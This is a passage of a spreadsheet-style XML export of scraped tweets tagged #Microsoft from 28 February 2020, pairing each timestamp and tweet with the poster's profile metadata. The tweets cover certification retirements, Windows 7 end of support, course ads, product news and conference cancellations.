    <t>{'id': 38291612, 'id_str': '38291612', 'name': 'Intrado Enterprise Collaboration', 'screen_name': 'IntradoCollab', 'location': '', 'description': 'Cloud-based #UCaaS solutions that make businesses more productive, efficient and effective. Available worldwide.', 'url': 'https://t.co/AEOaroSP5f', 'entities': {'url': {'urls': [{'url': 'https://t.co/AEOaroSP5f', 'expanded_url': 'https://www.intrado.com/enterprise-collaboration', 'display_url': 'intrado.com/enterprise-colâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23081, 'friends_count': 24236, 'listed_count': 569, 'created_at': 'Wed May 06 22:17:48 +0000 2009', 'favourites_count': 10540, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8279,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'http://pbs.twimg.com/profile_images/1164988116333187072/KtsIkc_4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164988116333187072/KtsIkc_4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38291612/1566589791', 'profile_link_color': '000000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '85DE59', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 15:05:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Word Masterclass for Certification - 89% OFF - Regular ($199.00) - Now Only $19.99
[Register] - https://t.co/uLMYTcGKtz
#Microsoft #BrianCulp #YouAccel #Courses #Learn #Learning #Knowledge 
Go from Beginner to Pro with Microsoft Word &amp;amp;amp; Get Certified 
This C</t>
  </si>
  <si>
    <t>Fri Feb 28 15:04:50 +0000 2020</t>
  </si>
  <si>
    <t>Digital Transformation Will Change Manufacturing As We Know It. Read Article: https://t.co/eGCJMfVEgs #ilinkdigital #ilinkdifference #digitaltransformation #cto #digitaltechnology #technology #digital #business #businesstransformation #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 15:04:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has announced the retirement of the #MCSA, #MCSD, and #MCSE certifications. The retirement date for the MCSA, MCSD, and MCSE is June 30th, 2020. https://t.co/cQ2GEIAXd8 #ITTraining</t>
  </si>
  <si>
    <t>Fri Feb 28 15:04:00 +0000 2020</t>
  </si>
  <si>
    <t>Digital Transformation Will Change Manufacturing As We Know It. Read Article: https://t.co/8upZmTIWLy #ilinkdigital #ilinkdifference #digitaltransformation #cto #digitaltechnology #technology #digital #business #businesstransformation #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 15:01:44 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 15:01:33 +0000 2020</t>
  </si>
  <si>
    <t>Trends at HIMSS20: Microsoft points to cost of care, access, clinician burnout
https://t.co/2P1fok9uFL
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65</t>
  </si>
  <si>
    <t>Fri Feb 28 15:01:29 +0000 2020</t>
  </si>
  <si>
    <t>Have you always dreamed of working from the beach? Now you can, with our #Teamworksolutions from #Microsoft. What are you waiting for? Check out this video to learn how you can empower your teams to work from virtually anywhere, on any device. https://t.co/ia4oWQnGoE</t>
  </si>
  <si>
    <t>Fri Feb 28 15:01:20 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #Azure #cloud         There's a reason there are over 120,000 new Azure customer subscriptions each month. Maybe it's time you take a look at a solution that offers the industry's largest security and compliance offerings. https://t.co/FFuh2saaNO</t>
  </si>
  <si>
    <t>Fri Feb 28 15:01:10 +0000 2020</t>
  </si>
  <si>
    <t>Upload and share files with #MicrosoftTeams https://t.co/DRKXOXp0zB 
#Microsoft #Teams https://t.co/Y2MZOQ6Q9a</t>
  </si>
  <si>
    <t>Fri Feb 28 15:01:07 +0000 2020</t>
  </si>
  <si>
    <t>Minecraft Earth has gotten a powerful new update https://t.co/ajHdA9Lklw #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 15:00:54 +0000 2020</t>
  </si>
  <si>
    <t>Windows Server and SQL Server Certifications are Gone #Microsoft #Azure  https://t.co/7Pq3XjAYy7</t>
  </si>
  <si>
    <t>Fri Feb 28 15:00:53 +0000 2020</t>
  </si>
  <si>
    <t>Are you an IT Manager in the Philly area: managing large scale IT Infrastructure (server storage backup Microsoft Linux)?
See new opportunity https://t.co/zz4SxL3Bwa
#jobsoftheweek #thetrevigroup #itmanager #phillyjobs #linuxserver #microsoft #backupsolutions #storagesystems</t>
  </si>
  <si>
    <t>Fri Feb 28 15:00:03 +0000 2020</t>
  </si>
  <si>
    <t>How Microsoft 365s new solution uses machine learning to stop data leaks and insider attacks #Microsoft365 #Microsoft https://t.co/VPHOrYoVGT</t>
  </si>
  <si>
    <t>Fri Feb 28 15:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to soon reveal Universal Print, a cloud-based print infrastructure service that eliminates Print Servers - https://t.co/i7o3GjhiTI via @mspoweruser #UniversalPrint #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 14:59:54 +0000 2020</t>
  </si>
  <si>
    <t>@Analyst_G $MSFT MASTERCHART the SIMPLEST &amp;amp; GREATEST Charts on t'Internet #MULTIDIAGONALS #microsoft #Trading $msft https://t.co/n81ckadnza</t>
  </si>
  <si>
    <t>{'id': 709105582356168704, 'id_str': '709105582356168704', 'name': 'Algotrading', 'screen_name': 'BANGONtrader', 'location': 'northyorks', 'description': '#MULTIDIAGONALS UNIQUE 21stCENTURY #TRADING See WHERE the ALGORITHMs Will BUY&amp;SELL in ADVANCE on ANY Chart Education ONLY NOT financial advice #FTSE100 #bitcoin', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2485, 'friends_count': 4971, 'listed_count': 42, 'created_at': 'Sun Mar 13 19:55:20 +0000 2016', 'favourites_count': 5047, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2753,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'http://pbs.twimg.com/profile_images/1212419127001964550/c1GZ0TaF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212419127001964550/c1GZ0TaF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/709105582356168704/1577898558',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</si>
  <si>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14:59:31 +0000 2020</t>
  </si>
  <si>
    <t>The 100X100X100 programme has been launched under the ambit of #Microsoft for #Startups, and will help companies go through digital transformation through rapid adoption of cutting-edge SaaS solutions.
@Google @satyanadella @500Startups @Microsoft 
#news #startupindia</t>
  </si>
  <si>
    <t>{'id': 974341187044888576, 'id_str': '974341187044888576', 'name': 'Himanshu Srivastav', 'screen_name': 'ivisionmod1', 'location': 'Gurugram', 'description': "The Next Big Thing by ivisionmod so far we have been featuring stories of Top Entrepreneurs of this Generation but now it's your time. Get featured in India's", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 147, 'listed_count': 0, 'created_at': 'Thu Mar 15 17:46:56 +0000 2018', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 40, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232921364094320640/Pumzrh-l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232921364094320640/Pumzrh-l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/974341187044888576/1582786339',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</si>
  <si>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14:59:09 +0000 2020</t>
  </si>
  <si>
    <t>Greenpeace urges AWS, Google and #Microsoft to cut #cloud ties with oil and gas customers https://t.co/LH77RwA7ta via @Hybrid_Circle #HPE #VMware</t>
  </si>
  <si>
    <t>Fri Feb 28 14:57:32 +0000 2020</t>
  </si>
  <si>
    <t>We are #Microsoft Microsoft Dynamics #ISV company and we are making industry specific solutions. #MSDyn365BC #MSDyn365</t>
  </si>
  <si>
    <t>{'id': 1233401694874218496, 'id_str': '1233401694874218496', 'name': 'BC4', 'screen_name': 'BC462871599', 'location': 'Fremont, California, US', 'description': 'BC4 is Microsoft Dynamics ISV company based in California. We are focused on Business Central and CRM specific industry solutions.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Fri Feb 28 14:41:06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'http://pbs.twimg.com/profile_images/1233404732573614080/doWVK8k6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233404732573614080/doWVK8k6_normal.jpg',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</si>
  <si>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14:55:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring the MCSA, MCSD &amp;amp; MCSE certifications on 30 June 2020.
https://t.co/uV9pW59KAR</t>
  </si>
  <si>
    <t>{'id': 1540571, 'id_str': '1540571', 'name': 'Tim Barrett', 'screen_name': 'timbarrett', 'location': 'Louisville, Kentucky USA', 'description': 'Network, SharePoint &amp; PowerShell geek, blogger, author, hot sauce aficionado, 9x Microsoft MVP, leatherworker, fake cartoonist, troublemaker, papercut survivor.', 'url': 'http://t.co/jqI8zgBxm9', 'entities': {'url': {'urls': [{'url': 'http://t.co/jqI8zgBxm9', 'expanded_url': 'http://nogeekleftbehind.com', 'display_url': 'nogeekleftbehind.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 783, 'friends_count': 89, 'listed_count': 103, 'created_at': 'Mon Mar 19 18:48:44 +0000 2007', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10497,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'http://pbs.twimg.com/profile_images/1195028680248111110/7P8oZT0P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195028680248111110/7P8oZT0P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1540571/1473352214',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</si>
  <si>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Feb 28 14:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Developing SQL Data Models
This course provides students how to implement both multidimensional and tabular data models and how to create cubes, dimensions, measures, and measure groups.
Buy here $749.00 https://t.co/EHlRRfT0Y2
#Microsoft #ITCareer  #MicrosoftCertification https://t.co/tjsPrzm0ce</t>
  </si>
  <si>
    <t>Fri Feb 28 14:54:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Book 1 (first generation) blowing batteries @surface @Microsoft @MicrosoftDE #microsoft #needhelp #wahttodo #unhappy #worried #surfacebook #dangerous #danger #batteryissue #microsofthelp
https://t.co/ApO4NEeQvv</t>
  </si>
  <si>
    <t>{'id': 198175877, 'id_str': '198175877', 'name': 'Hermann Fischer', 'screen_name': 'HECelectronics', 'location': 'Deutschland', 'description': 'Visionary VR, games, desktop and mobile software developer, 2D/3D animation and graphic design passioned entrepreneur.\nhttps://t.co/0wdm0QuelD', 'url': 'https://t.co/1EdzBhtWpT', 'entities': {'url': {'urls': [{'url': 'https://t.co/1EdzBhtWpT', 'expanded_url': 'https://totalcreations.de', 'display_url': 'totalcreations.de', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/0wdm0QuelD', 'expanded_url': 'http://light-and-dance.com', 'display_url': 'light-and-dance.com', 'indices': [119, 142]}]}}, 'protected': False, 'followers_count': 187, 'friends_count': 572, 'listed_count': 13, 'created_at': 'Sun Oct 03 15:27:43 +0000 2010', 'favourites_count': 747, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1125,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'http://pbs.twimg.com/profile_images/809419346024026113/uOo8r01C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/809419346024026113/uOo8r01C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/198175877/1409104272',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</si>
  <si>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Fri Feb 28 14:54:01 +0000 2020</t>
  </si>
  <si>
    <t>Windows 7 reached its end of support on 14th January. Users will receive no further security updates, leaving you at risk of cyber-attack. Visit our website to read more about the risks and your upgrade options. 
#Windows #Microsoft #EndOfSupport #Windows7
https://t.co/AbFBe9oPx8</t>
  </si>
  <si>
    <t>{'id': 134780528, 'id_str': '134780528', 'name': 'PSU Technology Group', 'screen_name': 'PSUTechnology', 'location': 'Cheltenham, UK', 'description': 'PSU Technology Group - Managed IT Services, Cloud &amp; Hosting, Connectivity, Unified Communications and Phone Maintenance Solutions for Businesses Across the UK.', 'url': 'https://t.co/T8gVLiWVNP', 'entities': {'url': {'urls': [{'url': 'https://t.co/T8gVLiWVNP', 'expanded_url': 'https://psu.co.uk', 'display_url': 'psu.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 836, 'friends_count': 1175, 'listed_count': 18, 'created_at': 'Mon Apr 19 12:28:50 +0000 2010', 'favourites_count': 315, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1741, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '262626', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/482535268172312577/RoWs40Zs_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/482535268172312577/RoWs40Zs_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/134780528/1493388545', 'profile_link_color': 'CE381E', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 14:51:46 +0000 2020</t>
  </si>
  <si>
    <t>Excellent #Windows10 &amp;amp; #Microsoft, I thought the death blue screen is no longer amoung us, Ive live fooled  https://t.co/YAbOmz47Xj</t>
  </si>
  <si>
    <t>{'id': 16940245, 'id_str': '16940245', 'name': 'Ben', 'screen_name': 'odsoul', 'location': 'Cuernavaca', 'description': "Soy Ben y como todos, a todo lo que dijo el padre yo 'nomas dije que si! :)", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 1150, 'listed_count': 18, 'created_at': 'Fri Oct 24 00:44:52 +0000 2008', 'favourites_count': 139, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22413,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'http://pbs.twimg.com/profile_images/1154957789573386240/4-qzBzhY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154957789573386240/4-qzBzhY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16940245/1564198371', 'profile_link_color': '000000', 'profile_sidebar_border_color': '5ED4DC', 'profile_sidebar_fill_color': '825C64', 'profile_text_color': '262226', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 14:51:00 +0000 2020</t>
  </si>
  <si>
    <t>@MSDynamicsWorld tapped into UpperEdges #Microsoft Practice Leader, @Adam_Mansfield_ for his thoughts on hybrid #cloud environments and where theyre heading https://t.co/EkDrhKEHNe</t>
  </si>
  <si>
    <t>Fri Feb 28 14:50:23 +0000 2020</t>
  </si>
  <si>
    <t>If you're serious about browser privacy, you should probably pass on Edge or Yandex, claims Dublin professor  The Register https://t.co/wFT7WMDbVd #technews #technology #security #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 14:50:06 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a recommendation for a "Windows Hello" compatible web cam for video chat. (external of course) #Microsoft #Windows10 #WindowsInsiders</t>
  </si>
  <si>
    <t>Fri Feb 28 14:48:59 +0000 2020</t>
  </si>
  <si>
    <t>Retailers all over the world use #Microsoft technology to improve the shopping experience for their customers from ensuring quality to delivering more personalized choices. https://t.co/fWatxCj4IL</t>
  </si>
  <si>
    <t>{'id': 188463124, 'id_str': '188463124', 'name': 'IT Authorities', 'screen_name': 'ITAuthorities', 'location': 'Tampa, FL', 'description': 'IT Support with a foundation in Managed Services.  Contact us to learn more about our enhanced approach to this crucial  business function today!\n 866-587-5211', 'url': 'http://t.co/vFlv5eeQBz', 'entities': {'url': {'urls': [{'url': 'http://t.co/vFlv5eeQBz', 'expanded_url': 'http://itauthorities.com', 'display_url': 'itauthorities.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1120, 'friends_count': 1851, 'listed_count': 85, 'created_at': 'Wed Sep 08 20:00:30 +0000 2010', 'favourites_count': 261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3422,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'http://pbs.twimg.com/profile_images/1074760774751522816/2nftoW-e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074760774751522816/2nftoW-e_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/188463124/1553537533', 'profile_link_color': '4F69FE',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</si>
  <si>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14:48:40 +0000 2020</t>
  </si>
  <si>
    <t>#Vatican joins #IBM, #Microsoft to call for facial recognition regulation (Reuters: Technology) https://t.co/Il9DZBCOsV</t>
  </si>
  <si>
    <t>{'id': 18021097, 'id_str': '18021097', 'name': 'James Ortega', 'screen_name': 'rlocone', 'location': 'US,  Kokomo IN', 'description': '#InfoSec enthusiast | #Surveillance, #OmniPresence, #6DegreesofSeparation #TotalInfoAwareness, #AI, #Espionage #5eyes', 'url': 'https://t.co/Fj5zjhKzYk', 'entities': {'url': {'urls': [{'url': 'https://t.co/Fj5zjhKzYk', 'expanded_url': 'http://bit.ly/sitrmfb', 'display_url': 'bit.ly/sitrmfb', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 84, 'listed_count': 9, 'created_at': 'Wed Dec 10 15:14:06 +0000 2008', 'favourites_count': 205, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8061,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'http://pbs.twimg.com/profile_images/1179343376832978945/2qBCG18B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179343376832978945/2qBCG18B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18021097/1394803615',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</si>
  <si>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14:45:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Epic and Unity are the latest to pull out of GDC over coronavirus concerns https://t.co/CtH6HDiVGj
via @rockpapershot #computing #microsoft https://t.co/CDHPdbxs9D</t>
  </si>
  <si>
    <t>Fri Feb 28 14:44:12 +0000 2020</t>
  </si>
  <si>
    <t>What a great turn out! This is so awesome! #digigirlz #wqed #gianteagle #microsoft  #datageek  #alwayslearning https://t.co/Gl1LyNfpZR</t>
  </si>
  <si>
    <t>{'id': 3519462567, 'id_str': '3519462567', 'name': 'Jessica Johnson', 'screen_name': 'sqldataninja', 'location': 'Pennsylvania, USA', 'description': 'Experienced Data &amp; Analytics enthusiast. #Data &amp; #AI Field #Engineer at #Microsoft (views here are my own)', 'url': 'https://t.co/iw7Ur24fGA', 'entities': {'url': {'urls': [{'url': 'https://t.co/iw7Ur24fGA', 'expanded_url': 'http://www.SQLDataNinja.com', 'display_url': 'SQLDataNinja.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 284, 'friends_count': 388, 'listed_count': 28, 'created_at': 'Wed Sep 02 04:14:25 +0000 2015', 'favourites_count': 864, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 836,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'http://pbs.twimg.com/profile_images/732525073349943296/iW4EXb6T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/732525073349943296/iW4EXb6T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3519462567/1450196022',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</si>
  <si>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14:42:15 +0000 2020</t>
  </si>
  <si>
    <t>#iOS and #Android developers: @#Microsoft's Blazor for building mobile apps gains traction
#Data443 #ARALOC  https://t.co/coBaiDTMwj</t>
  </si>
  <si>
    <t>{'id': 18915286, 'id_str': '18915286', 'name': 'Tom J. Canova, Modevity / Cognitus', 'screen_name': 'Modevity', 'location': 'Malvern, PA', 'description': 'Co-Founder, #Enterprise #Mobile Content Distribution, #Encryption #Security, #ARALOC Platform, #Cognitus-Commercial Intelligence Enhanced #DueDiligence', 'url': 'https://t.co/Kyz8QRxo8x', 'entities': {'url': {'urls': [{'url': 'https://t.co/Kyz8QRxo8x', 'expanded_url': 'http://www.modevity.com', 'display_url': 'modevity.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1821, 'friends_count': 5001, 'listed_count': 164, 'created_at': 'Mon Jan 12 21:00:20 +0000 2009', 'favourites_count': 420, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7409,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'http://pbs.twimg.com/profile_images/1205236095497187331/JNaTbp1r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205236095497187331/JNaTbp1r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18915286/1420042770', 'profile_link_color': 'F4791F',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</si>
  <si>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Fri Feb 28 14:40:02 +0000 2020</t>
  </si>
  <si>
    <t>Still running #Windows7? On 14 Jan 2020 #Microsoft ended support fro Windows 7  If you are still using the software you at risk! Here's what you need to know &amp;amp; do immediately  https://t.co/TYrNm3ntG7 https://t.co/WH79KLOLkR</t>
  </si>
  <si>
    <t>{'id': 19594836, 'id_str': '19594836', 'name': 'Panda Security ZA', 'screen_name': 'PandaSecurityZA', 'location': 'Africa', 'description': "Panda Security (South Africa) - keeping Africa's cyberspace safe...", 'url': 'https://t.co/VJjvrgs0tK', 'entities': {'url': {'urls': [{'url': 'https://t.co/VJjvrgs0tK', 'expanded_url': 'http://www.pandasecurity.africa', 'display_url': 'pandasecurity.africa', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 667, 'friends_count': 320, 'listed_count': 64, 'created_at': 'Tue Jan 27 14:47:38 +0000 2009', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3557,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'http://pbs.twimg.com/profile_images/562524836937744385/CK5IKzS0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/562524836937744385/CK5IKzS0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19594836/1562926271',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</si>
  <si>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Feb 28 14:40:00 +0000 2020</t>
  </si>
  <si>
    <t>When it comes to #ApplicationDevelopment, to show your credibility, having a #certification helps astoundingly. One of the prominent ones is #Microsoft #Developers Certification. @MarTech_Review lists out 4 certifications to consider. https://t.co/ijNEmJ73Vn</t>
  </si>
  <si>
    <t>Fri Feb 28 14:39:55 +0000 2020</t>
  </si>
  <si>
    <t>Thank you @wqed for parterning with #Microsoft to bring the #Digigirlz to Pittsburgh!</t>
  </si>
  <si>
    <t>{'id': 786951860829626368, 'id_str': '786951860829626368', 'name': 'Kiley', 'screen_name': 'SQL412', 'location': '', 'description': 'Making data pretty and useful one day at a time!  Slight obsession with everything Pittsburgh #Love what you do. #MicrosoftLife', 'url': 'https://t.co/TLOOpvq92B', 'entities': {'url': {'urls': [{'url': 'https://t.co/TLOOpvq92B', 'expanded_url': 'http://meetup.com/Pittsburgh-Power-BI-Meetup', 'display_url': 'meetup.com/Pittsburgh-Powâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 245, 'friends_count': 190, 'listed_count': 16, 'created_at': 'Fri Oct 14 15:28:39 +0000 2016', 'favourites_count': 973, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 564, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/984244764630380544/M0hJrwiM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984244764630380544/M0hJrwiM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/786951860829626368/1477583605',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</si>
  <si>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14:38:40 +0000 2020</t>
  </si>
  <si>
    <t>Windows Server and SQL Server Certifications are Gone
#certpocalypse #MCSE #MCSD #MCSA #Microsoft #MicrosoftCertified #WindowsServer #SQLServer https://t.co/ZgEuqWb3jT</t>
  </si>
  <si>
    <t>Fri Feb 28 14:38:38 +0000 2020</t>
  </si>
  <si>
    <t>Windows Server and SQL Server Certifications are Gone
#certpocalypse #MCSE #MCSD #MCSA #Microsoft #MicrosoftCertified #WindowsServer #SQLServer https://t.co/zkjY3Y8c0H</t>
  </si>
  <si>
    <t>Fri Feb 28 14:35:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Partners Nigerian Institution To Boost Agricultural Sector https://t.co/BcBr0s53Og #Business #Microsoft https://t.co/5f6MxeT3O4</t>
  </si>
  <si>
    <t>{'id': 2841708765, 'id_str': '2841708765', 'name': 'Focus Ogun', 'screen_name': 'FocusOgun', 'location': 'Ogun', 'description': 'Reflecting The Good Values Of Ogun People -', 'url': 'http://t.co/3ggK3pFCSJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/3ggK3pFCSJ', 'expanded_url': 'http://focusogun.com', 'display_url': 'focusogun.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 226, 'friends_count': 133, 'listed_count': 3, 'created_at': 'Thu Oct 23 06:30:25 +0000 2014', 'favourites_count': 75, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4531,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'http://pbs.twimg.com/profile_images/543830909154512897/iCrUDbqG_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/543830909154512897/iCrUDbqG_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2841708765/1414161224',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</si>
  <si>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14:35:04 +0000 2020</t>
  </si>
  <si>
    <t>Online tutorial: How to Script for Port Range Forwarding In #Azure https://t.co/cc6fQJHB5O #Azure #NAT #Microsoft #MVPhours https://t.co/7bZF4aoxvK</t>
  </si>
  <si>
    <t>{'id': 150604896, 'id_str': '150604896', 'name': 'European SharePoint Office 365 &amp; Azure Conference', 'screen_name': 'EuropeanSP', 'location': 'Europe', 'description': 'Join us for the latest news and exclusive content from our community across a programme of webinars, blogs, eBooks and more.', 'url': 'https://t.co/O0GyH1uXZy', 'entities': {'url': {'urls': [{'url': 'https://t.co/O0GyH1uXZy', 'expanded_url': 'http://www.sharepointeurope.com', 'display_url': 'sharepointeurope.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7987, 'friends_count': 4735, 'listed_count': 564, 'created_at': 'Tue Jun 01 10:28:57 +0000 2010', 'favourites_count': 8537, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 34007,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'http://pbs.twimg.com/profile_images/1146375037483720707/83Uatf4N_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146375037483720707/83Uatf4N_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/150604896/1582300551',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</si>
  <si>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14:33:59 +0000 2020</t>
  </si>
  <si>
    <t>In his latest post, #Microsoft #Architect, Mark Arnold gives us An #Office #365 fable. One of a company spin-off and a mission: Get these 100 users off our Office 365, but they  need access to all those terabytes of project files and design drawings."  https://t.co/GOz0AAqi0X</t>
  </si>
  <si>
    <t>Fri Feb 28 14:31:25 +0000 2020</t>
  </si>
  <si>
    <t>3/3: For more information about Henshaws, please visit: https://t.co/cXepLt0hUt and pop over to https://t.co/FDoMg7qVf4 to discover more community groups we are supporting. #Charity #Community #GivingBack #Henshaws #Microsoft #Teams #Office365 #SharePoint https://t.co/S5Htr1VBgv</t>
  </si>
  <si>
    <t>Fri Feb 28 14:31:22 +0000 2020</t>
  </si>
  <si>
    <t>#MICROSOFT IS CANCELLING IGNITE TOUR ON MARCH 4-5 IN ZURICH</t>
  </si>
  <si>
    <t>{'id': 1224354503820005380, 'id_str': '1224354503820005380', 'name': 'sellvolbuytesla', 'screen_name': 'sellvolbuytesla', 'location': '', 'description': 'crushing vol', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 0, 'listed_count': 3, 'created_at': 'Mon Feb 03 15:30:44 +0000 2020', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1083, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224411707084279810/TiqcpHvs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224411707084279810/TiqcpHvs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224354503820005380/1580757474',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</si>
  <si>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14:30:22 +0000 2020</t>
  </si>
  <si>
    <t>A guide to building enterprise-ready flows with #Microsoft Power Automate https://t.co/XSuYZuolKx</t>
  </si>
  <si>
